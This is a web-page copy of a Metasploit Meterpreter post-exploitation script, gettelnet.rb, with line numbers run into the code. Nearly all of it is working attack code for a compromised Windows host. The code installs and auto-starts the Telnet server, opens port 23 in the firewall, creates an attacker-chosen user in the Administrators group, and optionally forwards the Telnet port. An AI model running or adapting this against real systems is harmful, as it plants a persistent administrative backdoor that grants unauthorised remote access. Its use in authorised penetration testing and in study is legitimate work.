Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/scripts/meterpreter/gettelnet.rb
Views: 11766
##1# WARNING: Metasploit no longer maintains or accepts meterpreter scripts.2# If you'd like to improve this script, please try to port it as a post3# module instead. Thank you.4##567# Author: Carlos Perez at carlos_perez[at]darkoperator.com8#-------------------------------------------------------------------------------9################## Variable Declarations ##################10@client = client11host_name = client.sys.config.sysinfo['Computer']12# Create Filename info to be appended to downloaded files13filenameinfo = "_" + ::Time.now.strftime("%Y%m%d.%M%S")1415# Create a directory for the logs16logs = ::File.join(Msf::Config.log_directory,'scripts', 'gettelnet')1718# Create the log directory19::FileUtils.mkdir_p(logs)2021# Cleanup script file name22@dest = logs + "/clean_up_" + filenameinfo + ".rc"2324@@exec_opts = Rex::Parser::Arguments.new(25"-h" => [ false, "Help menu." ],26"-e" => [ false, "Enable Telnet Server only." ],27"-p" => [ true, "The Password of the user to add." ],28"-u" => [ true, "The Username of the user to add." ],29"-f" => [ true, "Forward Telnet Connection." ]30)31def checkifinst()32# This won't work on windows 2000 since there is no sc.exe33print_status("Checking if Telnet is installed...")34begin35registry_getvaldata("HKLM\\SYSTEM\\CurrentControlSet\\services\\TlntSvr\\","Start")36return true37rescue38return false3940end41end4243#---------------------------------------------------------------------------------------------------------44def insttlntsrv()45trgtos = @client.sys.config.sysinfo['OS']46if trgtos =~ /Vista|7|2008/47print_status("Checking if Telnet Service is Installed")48if checkifinst()49print_status("Telnet Service Installed on Target")50else51print_status("Installing Telnet Server Service ......")52cmd_exec("cmd /c ocsetup TelnetServer")53prog2check = "ocsetup.exe"54found = 055while found == 056@client.sys.process.get_processes().each do |x|57found =158if prog2check == (x['name'].downcase)59print_line "*"60sleep(0.5)61found = 062end63end64end65file_local_write(@dest,"execute -H -f cmd.exe -a \"/c ocsetup TelnetServer /uninstall\"")66print_status("Finished installing the Telnet Service.")6768end69elsif trgtos =~ /2003/70file_local_write(@dest,"reg setval -k \"HKLM\\SYSTEM\\CurrentControlSet\\services\\TlntSvr\\\" -v 'Start' -d \"1\"")71end72end73#---------------------------------------------------------------------------------------------------------74def enabletlntsrv()75key2 = "HKLM\\SYSTEM\\CurrentControlSet\\services\\TlntSvr\\"76value2 = "Start"77begin78v2 = registry_getvaldata(key2,value2)79print_status "Setting Telnet Server Services service startup mode"80if v2 != 281print_status "\tThe Telnet Server Services service is not set to auto, changing it to auto ..."82cmmds = [ 'sc config TlntSvr start= auto', "sc start TlntSvr", ]83cmmds. each do |cmd|84cmd_exec(cmd)85end86else87print_status "\tTelnet Server Services service is already set to auto"88end89# Enabling Exception on the Firewall90print_status "\tOpening port in local firewall if necessary"91cmd_exec('netsh firewall set portopening protocol = tcp port = 23 mode = enable')9293rescue::Exception => e94print_status("The following Error was encountered: #{e.class} #{e}")95end9697end98#---------------------------------------------------------------------------------------------------------99def addrdpusr(username, password)100print_status "Setting user account for logon"101print_status "\tAdding User: #{username} with Password: #{password}"102begin103cmd_exec("net user #{username} #{password} /add")104file_local_write(@dest,"execute -H -f cmd.exe -a \"/c net user #{username} /delete\"")105print_status "\tAdding User: #{username} to local group TelnetClients"106cmd_exec("net localgroup \"TelnetClients\" #{username} /add")107108print_status "\tAdding User: #{username} to local group Administrators"109cmd_exec("net localgroup Administrators #{username} /add")110111print_status "You can now login with the created user"112rescue::Exception => e113print_status("The following Error was encountered: #{e.class} #{e}")114end115end116#---------------------------------------------------------------------------------------------------------117def message118print_status "Windows Telnet Server Enabler Meterpreter Script"119end120def usage121print_line("Windows Telnet Server Enabler Meterpreter Script")122print_line("Usage: gettelnet -u <username> -p <password>")123print_line(@@exec_opts.usage)124raise Rex::Script::Completed125end126127128#check for proper Meterpreter Platform129def unsupported130print_error("This version of Meterpreter is not supported with this Script!")131raise Rex::Script::Completed132end133134135################## MAIN ##################136# Parsing of Options137usr = nil138pass = nil139frwrd = nil140enbl = nil141@@exec_opts.parse(args) { |opt, idx, val|142case opt143when "-u"144usr = val145when "-p"146pass = val147when "-h"148usage149when "-f"150frwrd = true151when "-e"152enbl = true153end154155}156157unsupported if client.platform != 'windows'158159if enbl or (usr!= nil && pass != nil)160message161if enbl162insttlntsrv()163enabletlntsrv()164end165if (usr!= nil && pass != nil)166addrdpusr(usr, pass)167end168print_status("For cleanup use command: run multi_console_command -r #{@dest}")169170else171usage172end173if frwrd == true174print_status("Starting the port forwarding at local port #{lport}")175client.run_cmd("portfwd add -L 0.0.0.0 -l #{lport} -p 23 -r 127.0.0.1")176end177178179